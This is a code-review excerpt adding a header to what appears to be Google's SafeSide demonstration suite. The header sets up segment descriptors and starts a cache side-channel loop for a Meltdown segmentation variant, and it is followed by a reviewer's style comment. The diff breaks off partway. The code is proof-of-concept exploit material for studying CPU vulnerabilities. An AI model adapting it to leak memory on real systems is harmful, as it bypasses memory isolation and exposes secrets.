demos/meltdown_segmentation_common.h

```diff
@@ -0,0 +1,129 @@
+/*
+ * Copyright 2019 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *   https://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <array>
+#include <cstring>
+#include <iostream>
+
+#include <asm/ldt.h>
+#include <signal.h>
+#include <sys/syscall.h>
+#include <unistd.h>
+
+#include "cache_sidechannel.h"
+#include "instr.h"
+#include "local_content.h"
+#include "meltdown_local_content.h"
+#include "utils.h"
+
+int descriptor_backup;
+
+// Sets up a segment descriptor in the local descriptor table.
+static void SetupSegment(int index, const char *base, int limit, bool present) {
+  // See: Intel SDM volume 3a "3.4.5 Segment Descriptors".
+  struct user_desc table_entry;
+  memset(&table_entry, 0, sizeof(struct user_desc));
+  table_entry.entry_number = index;
+  // We must shift the base address one byte below to bypass the minimal segment
+  // size which is one byte.
+  table_entry.base_addr = reinterpret_cast<unsigned int>(base - 1);
+  // No size limit for a present segment, one byte for a non-present segment.
+  // Limit is the offset of the last accessible byte, so even a value of zero
+  // creates a one-byte segment.
+  table_entry.limit = limit;
+  // No 16-bit segment.
+  table_entry.seg_32bit = 1;
+  // No direction or conforming bits.
+  table_entry.contents = 0;
+  // Writeable segment.
+  table_entry.read_exec_only = 0;
+  // Limit is in bytes, not in pages.
+  table_entry.limit_in_pages = 0;
+  // True iff present is false.
+  table_entry.seg_not_present = !present;
+  int result = syscall(__NR_modify_ldt, 1, &table_entry,
+                       sizeof(struct user_desc));
+  if (result != 0) {
+    std::cerr << "Segmentation setup failed." << std::endl;
+    exit(EXIT_FAILURE);
+  }
+}
+
+static char MeltdownSegmentationLeakByte(size_t offset) {
+  CacheSideChannel sidechannel;
+  const std::array<BigByte, 256> &oracle = sidechannel.GetOracle();
+
+  for (int run = 0;; ++run) {
+    size_t safe_offset = run % strlen(public_data);
+    sidechannel.FlushOracle();
+
+    // Successful execution accesses safe_offset in the public data.
+    ForceRead(oracle.data() +
+              static_cast<size_t>(public_data[safe_offset]));
+
+#if SAFESIDE_SEGMENT_DESCRIPTOR_SS
```

Comment:
If we have to choose between sort of unpalatable options, I'd prefer to templatize this function and pass e.g. `GetSS`, `SetSS`, and `ReadUsingSS` as template parameters rather than use the preprocessor.